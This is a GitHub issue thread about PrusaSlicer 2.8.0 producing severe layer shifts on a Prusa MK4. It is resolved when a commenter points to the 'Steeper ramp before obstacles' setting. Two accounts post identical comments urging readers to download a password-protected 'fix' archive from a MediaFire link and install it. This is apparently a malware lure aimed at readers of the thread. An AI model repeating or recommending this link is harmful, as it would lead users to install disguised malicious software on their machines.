prusa3d/PrusaSlicer #13304: Extreme layer shift of about 25 mm

Joachim477, 2024-08-27:
### Description of the bug

Hello
I am trying to print dry boxes from user IVDx Consulting on printables. It is available wit h the following link: https://www.printables.com/de/model/930569-a-wider-dry-filament-box-for-3-d-printing/files. The file i have problems with is the box-base-large.stl.
In this ZIP-File i have attached the bgcode for this print. Opening in Prusa gcode viewer it looks all fine Supports are enabled and visible.
[1-box-base-large_0.4n_0.15mm_PLA_MK4IS_3h53m.zip](https://github.com/user-attachments/files/16758156/1-box-base-large_0.4n_0.15mm_PLA_MK4IS_3h53m.zip)
The printing result looks like this:
This one shows the complete print, supports are removed. The red lines indicate were the part is shifted. It happen at an height of about 28,4 mm.
[image]
The second picture is a more detailed view of one end of the print.
[image]

This happened twice for i tried it two times and the result was the same.

For further testing i cut the print file to reduce time and cost.
The bgcode is attached here.
[2-box-base-large_0.4n_0.3mm_PLA_MK4IS_1h15m.zip](https://github.com/user-attachments/files/16758341/2-box-base-large_0.4n_0.3mm_PLA_MK4IS_1h15m.zip)
The result can be seen here in Pic-3.  I stopped the printing earlier because i noticed that the part with the red line was bent up a little bit and the print head got stuck at this position
[image]

Next test was the same print file, self drawn support and the print was rotated about 45 degrees.
The bgcode is attached here.
[3-box-base-large_0.4n_0.2mm_PLA_MK4IS_1h13m.zip](https://github.com/user-attachments/files/16758348/3-box-base-large_0.4n_0.2mm_PLA_MK4IS_1h13m.zip)
The result was even stranger because the object and the support were printed in different angles. The red and green lines in Pic-4 should be parallel
[image]
[image]

I have no idea what happened. Any advice would be great.

### Project file & How to reproduce

[1-box-base-large_0.4n_0.15mm_PLA_MK4IS_3h53m.zip](https://github.com/user-attachments/files/16758392/1-box-base-large_0.4n_0.15mm_PLA_MK4IS_3h53m.zip)
[2-box-base-large_0.4n_0.3mm_PLA_MK4IS_1h15m.zip](https://github.com/user-attachments/files/16758394/2-box-base-large_0.4n_0.3mm_PLA_MK4IS_1h15m.zip)
[3-box-base-large_0.4n_0.2mm_PLA_MK4IS_1h13m.zip](https://github.com/user-attachments/files/16758395/3-box-base-large_0.4n_0.2mm_PLA_MK4IS_1h13m.zip)

### Checklist of files included above

- [ ] Project file
- [ ] Screenshot

### Version of PrusaSlicer

2.8.0

### Operating system

Win 11 Pro 

### Printer model

Prusa MK4

ESMELSTEPHANE24, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

ahmar7, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

RPospisil, 2024-08-27:
Could it be this? [Enable "Steeper ramp before obstacles" (printer/extruder configuration) by default - when disabled unpredictable crashes/layer shifts occures #13235] ( https://github.com/prusa3d/PrusaSlicer/issues/13235 )

Joachim477, 2024-08-28:
Hello RPospisil
i think you made my day. I tested it und my testprint worked.  
Thank you for your tip.